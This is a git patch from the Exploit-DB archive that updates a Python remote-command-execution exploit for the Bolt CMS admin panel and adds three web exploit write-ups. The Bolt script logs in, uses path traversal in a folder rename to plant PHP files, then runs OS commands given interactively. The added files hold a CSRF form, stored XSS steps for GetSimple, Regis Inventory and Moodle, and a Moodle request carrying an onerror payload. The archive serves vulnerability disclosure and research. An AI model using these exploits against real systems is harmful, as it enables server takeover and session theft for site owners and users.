From 95de3ffa8480c6e2ca966aa685a19e6eb4fcd1b9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 27 Mar 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-03-27 4 changes to exploits/shellcodes GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS Moodle 3.10.3 - 'label' Persistent Cross Site Scripting --- exploits/php/webapps/48296.py | 149 ++++++++++++++------------------ exploits/php/webapps/49712.html | 21 +++++ exploits/php/webapps/49713.txt | 22 +++++ exploits/php/webapps/49714.txt | 50 +++++++++++ files_exploits.csv | 3 + 5 files changed, 159 insertions(+), 86 deletions(-) create mode 100644 exploits/php/webapps/49712.html create mode 100644 exploits/php/webapps/49713.txt create mode 100644 exploits/php/webapps/49714.txt diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py index 9b3401a53..affcf1865 100755 --- a/exploits/php/webapps/48296.py +++ b/exploits/php/webapps/48296.py @@ -7,11 +7,6 @@ # Tested on: Linux # CVE : not-yet-0day -# last version - -# p0c - - #!/usr/bin/python import requests @@ -20,37 +15,26 @@ import warnings import re import os from bs4 import BeautifulSoup -from colorama import init -from termcolor import colored - -init() - +from colorama import init +from termcolor import colored + +init() +#pip install -r requirements.txt print(colored(''' - ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ - ▄▄▄▄▄▄▄▄▄▄▄ -▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ -▐░░▌▐░░░░░░░░░░░▌ -▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ -▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ -▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ -▐░▌▐░▌▐░▌ -▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ -▐░▌▐░█▄▄▄▄▄▄▄▄▄ -▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ - ▐░▌▐░░░░░░░░░░░▌ -▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ -▀▀▀▀▀▀▀▀▀█░▌ -▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ - ▐░ -▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ -▄▄▄▄▄▄▄▄▄█░▌ -▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ -▐░▌▐░░░░░░░░░░░▌ - ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ - ▀▀▀▀▀▀▀▀▀▀▀ + ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ ▐░░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ +▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░ +▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ + ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ Pre Auth rce with low credintanl -By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) +#Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) @@ -65,8 +49,7 @@ password = sys.argv[3] request = requests.session() -print((colored("[+] Retrieving CSRF token to submit the login -form","green"))) +print((colored("[+] Retrieving CSRF token to submit the login form","green"))) page = request.get(url+"/bolt/login") html_content = page.text soup = BeautifulSoup(html_content, 'html.parser') @@ -87,15 +70,15 @@ print((colored("[+] Login token is : {0}","green")).format(token)) aaa = request.get(url+"/bolt/profile") soup0 = BeautifulSoup(aaa.content, 'html.parser') token0 = soup0.findAll('input')[6].get("value") -data_profile = { -"user_profile[password][first]":"password", -"user_profile[password][second]":"password", -"user_profile[email]":"a@a.com", -"user_profile[displayname]":"", -"user_profile[save]":"", -"user_profile[_token]":token0 +data_profile = { + "user_profile[password][first]":"password", + "user_profile[password][second]":"password", + "user_profile[email]":"a@a.com", + "user_profile[displayname]":"", + "user_profile[save]":"", + "user_profile[_token]":token0 -} + } profile = request.post(url+'/bolt/profile',data_profile) @@ -113,55 +96,49 @@ tables = soup2.find_all('span', class_ = 'entry disabled') print((colored("[+] SESSION INJECTION ","green"))) -for all_tables in tables: - -f= open("session.txt","a+") -f.write(all_tables.text+"\n") -f.close() -num_lines = sum(1 for line in open('session.txt')) - -renamePostData = { -"namespace": "root", -"parent": "/app/cache/.sessions", -"oldname": all_tables.text, -"newname": "../../../public/files/test{}.php".format(num_lines), -"token": csrf - } -rename = request.post(url+"/async/folder/rename", renamePostData) +for all_tables in tables: + + f= open("session.txt","a+") + f.write(all_tables.text+"\n") + f.close() + num_lines = sum(1 for line in open('session.txt')) + + renamePostData = { + "namespace": "root", + "parent": "/app/cache/.sessions", + "oldname": all_tables.text, + "newname": "../../../public/files/test{}.php".format(num_lines), + "token": csrf + } + rename = request.post(url+"/async/folder/rename", renamePostData) + + try: + url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) -try: -url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) - -rev = requests.get(url1).text -r1 = re.findall('php',rev) - -r2 = r1[0] -if r2 == "php" : -fileINJ = "test{}".format(num_lines) - -print((colored("[+] FOUND : "+fileINJ,"green"))) - -except IndexError: -print((colored("[-] Not found.","red"))) + rev = requests.get(url1).text + r1 = re.findall('php',rev) + + r2 = r1[0] + if r2 == "php" : + fileINJ = "test{}".format(num_lines) + + print((colored("[+] FOUND : "+fileINJ,"green"))) + + except IndexError: + print((colored("[-] Not found.","red"))) new_name = 0 while new_name != 'quit': -inputs = input(colored("Enter OS command , for exit 'quit' : -","green","on_red")) -if inputs == "quit" : -exit() -else: -a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) -aa = a.text -r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) + inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red")) + if inputs == "quit" : + exit() + else: + a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) + aa = a.text + r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) -print((r11)[0]) - - - - -Greetz to : all my friends \ No newline at end of file + print((r11)[0]) \ No newline at end of file diff --git a/exploits/php/webapps/49712.html b/exploits/php/webapps/49712.html new file mode 100644 index 000000000..365f49e08 --- /dev/null +++ b/exploits/php/webapps/49712.html @@ -0,0 +1,21 @@ +# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS +# Exploit Author: Abhishek Joshi +# Date: March 25, 2021 +# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download +# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip +# Version: 0.1 +# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10 +# Tested against: Firefox 78.7.0esr (64-bit) + +# Vulnerability Description: +# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site. + +## CSRF POST Form Method + +
+ + + + +
+ \ No newline at end of file diff --git a/exploits/php/webapps/49713.txt b/exploits/php/webapps/49713.txt new file mode 100644 index 000000000..4afa1075c --- /dev/null +++ b/exploits/php/webapps/49713.txt @@ -0,0 +1,22 @@ +# Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS +# Exploit Author: George Tsimpidas +# Date: 2021-03-25 +# Vendor Homepage: www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip +# Version : 1.0.0 +# Tested on: Kali Linux 2020.4 +# Category: Webapp + +# Description + +Regis Inventory And Monitoring System, suffers from a stored cross site scripting on Item's List Category + +#PoC + +1. Login as admin : http://localhost/regis_inventory/index.php +2. Visit : http://localhost/regis_inventory/item.php +3. Click add a New Item and input your payload on "Generic Name" textbox. + +Payload : + +4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up \ No newline at end of file diff --git a/exploits/php/webapps/49714.txt b/exploits/php/webapps/49714.txt new file mode 100644 index 000000000..7333c0d2e --- /dev/null +++ b/exploits/php/webapps/49714.txt @@ -0,0 +1,50 @@ +# Exploit Title: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting +# Date: 25.03.2021 +# Author: Vincent666 ibn Winnie +# Software Link: https://moodle.org/ +# Tested on: Windows 10 +# Web Browser: Mozilla Firefox +# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month + +Choose a role : Student (example) +Open calendar : +https://school.localhost/calendar/view.php?view=month + +Create new event: +Example: +Event Title "Test" +Description :Choose Insert Video File and choose Video: +Video Source Url you can paste video link from youtube + +And open Subtitles and Captions: +Subtitle track URL use video link from youtube +Field Label : There is we can use xss code: + + + +or try in base64 + + + +Insert Media and save this. +Open event and get stored xss. + +POST: + +https://school.localhost/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form +Host: school.localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate, br +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Content-Length: 996 +Origin: https://school.localhost +Connection: keep-alive +Referer: https://school.localhost/calendar/view.php?view=month +Cookie: MoodleSession=4ea0036558425526decc096ed375b886; +EU_COOKIE_LAW_CONSENT=true + +[{"index":0,"methodname":"core_calendar_submit_create_update_form","args":{"formdata":"id=0&userid=56&modulename=&instance=0&visible=1&eventtype=user&sesskey=vCHlHS7oIl&_qf__core_calendar_local_event_forms_create=1&mform_showmore_id_general=1&name=test×tart%5Bday%5D=25×tart%5Bmonth%5D=3×tart%5Byear%5D=2021×tart%5Bhour%5D=10×tart%5Bminute%5D=4&description%5Btext%5D=%3Cp%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%3E%26nbsp%3B%3Cvideo%20controls%3D%22true%22%3E%3Csource%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%3E%3Ctrack%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%20kind%3D%22subtitles%22%20srclang%3D%22en%22%20label%3D%22%3Cimg%20src%3D%26quot%3B1%26quot%3B%20onerror%3D%26quot%3Balert(1)%26quot%3B%20%2F%3E%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%3C%2Fvideo%3E%26nbsp%3B%3Cbr%3E%3C%2Fp%3E&description%5Bformat%5D=1&description%5Bitemid%5D=495874277&location=&duration=0"}}] \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4bad37e64..98edaeb89 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43892,4 +43892,7 @@ id,file,description,date,author,type,platform,port 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware, 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware, 49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",2021-03-25,"Andrea Gonzalez",webapps,php, +49712,exploits/php/webapps/49712.html,"GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS",2021-03-26,"Abhishek Joshi",webapps,php, +49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS",2021-03-26,"George Tsimpidas",webapps,php, +49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",2021-03-26,Vincent666,webapps,php, 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,